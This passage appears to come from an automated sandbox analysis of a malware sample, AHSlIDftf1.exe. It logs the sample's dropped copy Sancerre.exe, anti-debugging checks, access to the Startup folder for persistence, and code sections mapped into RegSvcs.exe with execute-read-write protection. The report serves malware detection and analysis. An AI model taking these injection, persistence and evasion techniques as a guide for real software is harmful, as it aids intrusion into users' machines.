                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598995Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598215Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597999Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597670Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597560Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595856Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595747Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595524Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594218Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2117Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7691Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2533Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7313Jump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeAPI coverage: 3.9 %
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeAPI coverage: 4.2 %
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00DBDBBE
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC68EE FindFirstFileW,FindClose,0_2_00DC68EE
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DC698F
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DBD076
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DBD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DBD3A9
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DC9642
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DC979D
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DC9B2B
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00DC5C97
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_005DDBBE
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E68EE FindFirstFileW,FindClose,1_2_005E68EE
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_005E698F
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005DD076
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005DD3A9
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005E9642
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_005E979D
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_005E9B2B
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005E5C97 FindFirstFileW,FindNextFileW,FindClose,1_2_005E5C97
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D542DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599517Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598366Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598196Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598081Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595351Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595014Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598995Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598215Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597999Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597670Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597560Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595856Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595747Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595524Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594218Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.2972860518.0000000000D28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                  Source: RegSvcs.exe, 00000008.00000002.2972997519.000000000132A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05139328 LdrInitializeThunk,2_2_05139328
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DCEAA2 BlockInput,0_2_00DCEAA2
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D82622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D82622
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D542DE
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D74CE8 mov eax, dword ptr fs:[00000030h]0_2_00D74CE8
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_015D9260 mov eax, dword ptr fs:[00000030h]0_2_015D9260
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_015D9200 mov eax, dword ptr fs:[00000030h]0_2_015D9200
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_015D7BA0 mov eax, dword ptr fs:[00000030h]0_2_015D7BA0
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_00594CE8 mov eax, dword ptr fs:[00000030h]1_2_00594CE8
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0107B178 mov eax, dword ptr fs:[00000030h]1_2_0107B178
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0107B1D8 mov eax, dword ptr fs:[00000030h]1_2_0107B1D8
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_01079B18 mov eax, dword ptr fs:[00000030h]1_2_01079B18
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 5_2_017444F0 mov eax, dword ptr fs:[00000030h]5_2_017444F0
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 5_2_01744550 mov eax, dword ptr fs:[00000030h]5_2_01744550
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 5_2_01742E90 mov eax, dword ptr fs:[00000030h]5_2_01742E90
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00DB0B62
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D82622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D82622
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D7083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D7083F
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D709D5 SetUnhandledExceptionFilter,0_2_00D709D5
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D70C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D70C21
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_005A2622
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_0059083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0059083F
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005909D5 SetUnhandledExceptionFilter,1_2_005909D5
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_00590C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00590C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
